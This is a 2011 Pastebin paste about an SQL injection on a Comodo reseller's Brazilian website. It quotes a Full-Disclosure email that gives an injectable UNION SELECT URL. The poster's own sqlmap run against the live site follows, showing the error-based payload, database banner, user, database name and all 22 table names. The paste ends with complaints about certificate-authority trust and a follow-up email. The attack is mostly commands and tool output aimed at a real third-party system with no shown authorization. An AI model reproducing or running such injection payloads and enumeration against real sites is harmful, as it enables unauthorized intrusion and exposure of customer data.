Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

Comodogate v2

By: Nicolai on May 22nd, 2011  |  syntax: None  |  size: 8.38 KB  |  views: 5,470  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
  2.         Sun, 22 May 2011 11:20:54 PDT
  3. X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
  4. Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
  5. From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles@ymail.com>
  6. X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
  7. Cc: suporte@comodobr.com
  8. Subject: [Full-disclosure] comodobr.com sqli
  9.  
  10.  
  11. vulnerable link:
  12. https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL
  13.  SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
  14.  
  15. http://pastebin.com/9qwdL1pA
  16.  
  17.  
  18. _______________________________________________
  19. Full-Disclosure - We believe in it.
  20. Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  21. Hosted and sponsored by Secunia - http://secunia.com/
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31. ---------------------------------------------------------------------
  32.  
  33.  
  34.  
  35.  
  36. PS C:\Python27> nslookup 199.48.147.35
  37. Server:  google-public-dns-a.google.com
  38. Address:  8.8.8.8
  39.  
  40. Name:    tor-exit-router35-readme.formlessnetworking.net
  41. Address:  199.48.147.35
  42.  
  43. >>> You're not going to find him... <<<
  44. >>> Let's check the host: <<<>>><<<>>><
  45.  
  46. PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard
  47.  
  48.     sqlmap/0.9 - automatic SQL injection and database takeover tool
  49.     http://sqlmap.sourceforge.net
  50.  
  51. [*] starting at: 21:00:00
  52.  
  53. Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
  54. POST data (--data) [Enter for None]:
  55. Injection difficulty (--level/--risk). Please choose:
  56. [1] Normal (default)
  57. [2] Medium
  58. [3] Hard
  59. > 1
  60. Enumeration (--banner/--current-user/etc). Please choose:
  61. [1] Basic (default)
  62. [2] Smart
  63. [3] All
  64. > 1
  65.  
  66. sqlmap is running, please wait..
  67.  
  68. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  69. ---
  70. Place: GET
  71. Parameter: prod
  72.     Type: error-based
  73.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  74.     Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198)
  75. THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  76. ---
  77.  
  78. [21:00:00] [INFO] retrieved: 5.0.91-community-log
  79.  
  80. web application technology: PHP 5.2.6, Apache 2.0.63
  81. back-end DBMS: MySQL 5.0
  82. banner:    '5.0.91-community-log'
  83.  
  84. [21:00:00] [INFO] retrieved: comodobr_site@localhost
  85. current user:    'comodobr_site@localhost'
  86.  
  87. [21:00:00] [INFO] retrieved: comodobr_comodobr
  88. current database:    'comodobr_comodobr'
  89.  
  90. current user is DBA:    'False'
  91.  
  92.  
  93. [*] shutting down at: 21:00:00
  94.  
  95. PS C:\Python27>
  96.  
  97.  
  98. >>> Looks real <<<>>><<<>>><<<>>><<<>>>
  99. >>> Let's see the inside of the db: <<<
  100.  
  101.  
  102. web application technology: PHP 5.2.6, Apache 2.0.63
  103. back-end DBMS: MySQL 5.0
  104. banner:    '5.0.91-community-log'
  105. current user:    'comodobr_site@localhost'
  106. current database:    'comodobr_comodobr'
  107. current user is DBA:    'False'
  108.  
  109. [21:00:00] [INFO] retrieved: comodobr_comodobr
  110. [21:00:00] [INFO] retrieved: comodo_boleto
  111. [21:00:00] [INFO] retrieved: comodobr_comodobr
  112. [21:00:00] [INFO] retrieved: comodo_boleto_associa
  113. [21:00:00] [INFO] retrieved: comodobr_comodobr
  114. [21:00:00] [INFO] retrieved: comodo_boleto_categoria
  115. [21:00:00] [INFO] retrieved: comodobr_comodobr
  116. [21:00:00] [INFO] retrieved: comodo_boleto_importado
  117. [21:00:00] [INFO] retrieved: comodobr_comodobr
  118. [21:00:00] [INFO] retrieved: comodo_boleto_status
  119. [21:00:00] [INFO] retrieved: comodobr_comodobr
  120. [21:00:00] [INFO] retrieved: comodo_confirm_pago
  121. [21:00:00] [INFO] retrieved: comodobr_comodobr
  122. [21:00:00] [INFO] retrieved: comodo_contab
  123. [21:00:00] [INFO] retrieved: comodobr_comodobr
  124. [21:00:00] [INFO] retrieved: comodo_expected_delivery_time
  125. [21:00:00] [INFO] retrieved: comodobr_comodobr
  126. [21:00:00] [INFO] retrieved: comodo_hosting_contas
  127. [21:00:00] [INFO] retrieved: comodobr_comodobr
  128. [21:00:00] [INFO] retrieved: comodo_meios_pago
  129. [21:00:00] [INFO] retrieved: comodobr_comodobr
  130. [21:00:00] [INFO] retrieved: comodo_pedido_status
  131. [21:00:00] [INFO] retrieved: comodobr_comodobr
  132. [21:00:00] [INFO] retrieved: comodo_pedido_status_codes
  133. [21:00:00] [INFO] retrieved: comodobr_comodobr
  134. [21:00:00] [INFO] retrieved: comodo_pedidos
  135. [21:00:00] [INFO] retrieved: comodobr_comodobr
  136. [21:00:00] [INFO] retrieved: comodo_pedidos_historico
  137. [21:00:00] [INFO] retrieved: comodobr_comodobr
  138. [21:00:00] [INFO] retrieved: comodo_prod_grupos
  139. [21:00:00] [INFO] retrieved: comodobr_comodobr
  140. [21:00:00] [INFO] retrieved: comodo_prods
  141. [21:00:00] [INFO] retrieved: comodobr_comodobr
  142. [21:00:00] [INFO] retrieved: comodo_resellers
  143. [21:00:00] [INFO] retrieved: comodobr_comodobr
  144. [21:00:00] [INFO] retrieved: comodo_server_software
  145. [21:00:00] [INFO] retrieved: comodobr_comodobr
  146. [21:00:00] [INFO] retrieved: comodo_users
  147. [21:00:00] [INFO] retrieved: comodobr_comodobr
  148. [21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
  149. [21:00:00] [INFO] retrieved: comodobr_comodobr
  150. [21:00:00] [INFO] retrieved: comodo_webhostreport_item
  151. [21:00:00] [INFO] retrieved: comodobr_comodobr
  152. [21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
  153. Database: comodobr_comodobr
  154. [22 tables]
  155. +-------------------------------+
  156. | comodo_boleto                 |
  157. | comodo_boleto_associa         |
  158. | comodo_boleto_categoria       |
  159. | comodo_boleto_importado       |
  160. | comodo_boleto_status          |
  161. | comodo_confirm_pago           |
  162. | comodo_contab                 |
  163. | comodo_expected_delivery_time |
  164. | comodo_hosting_contas         |
  165. | comodo_meios_pago             |
  166. | comodo_pedido_status          |
  167. | comodo_pedido_status_codes    |
  168. | comodo_pedidos                |
  169. | comodo_pedidos_historico      |
  170. | comodo_prod_grupos            |
  171. | comodo_prods                  |
  172. | comodo_resellers              |
  173. | comodo_server_software        |
  174. | comodo_users                  |
  175. | comodo_vw_crm_clientes        |
  176. | comodo_webhostreport_item     |
  177. | comodo_webhostreport_subitem  |
  178. +-------------------------------+
  179.  
  180.  
  181. [*] shutting down at: 21:00:00
  182.  
  183. PS C:\Python27>
  184.  
  185.  
  186. When are comodo going to fix this? How come comodo is a CA? They shouldn't be trusted! And what about T√úRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CA's, when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?
  187.  
  188. GET YOUR SHIT TOGETHER.
  189.  
  190.  
  191.  
  192.  
  193. EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
  194. I've just checked his claims, which was true. Everyone can claim that they hacked comodo, but that the vulnerable was fixed, so all I have done is open sqlmap and tested :-)
  195.  
  196. Also here's a new response:
  197.  
  198.  
  199.  
  200.  
  201. Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
  202.         Tue, 24 May 2011 14:58:39 PDT
  203. X-Mailer: YahooMailWebService/0.8.111.303096
  204. Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
  205. From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
  206. Cc: "support@comodobr.com" <support@comodobr.com>
  207. Subject: [Full-disclosure] My comments on comodobr.com
  208.  
  209.  
  210.     I have to agree with Comodo president and CEO, Melih Abdulhayoglu.
  211.      
  212.     In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
  213.     However the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten own their own security. further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.
  214.      
  215.     Just my 50 cents
  216.      
  217.     [Edit]
  218.     The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSR's and client info shouldn't be "readily available" as this.
  219.     No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
  220.     That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.
  221.  
  222.  
  223.  
  224. http://pastebin.com/MFSUdCnk
  225.  
  226. _______________________________________________
  227. Full-Disclosure - We believe in it.
  228. Hosted and sponsored by Secunia - http://secunia.com/
  229.  
  230.  
  231.  
  232.  
  233.  
  234.  
  235. PS C:\Users\Nicolai> nslookup 199.48.147.35
  236. Server:  google-public-dns-a.google.com
  237. Address:  8.8.8.8
  238.  
  239. Name:    tor-exit-router35-readme.formlessnetworking.net
  240. Address:  199.48.147.35
  241.  
  242. PS C:\Users\Nicolai>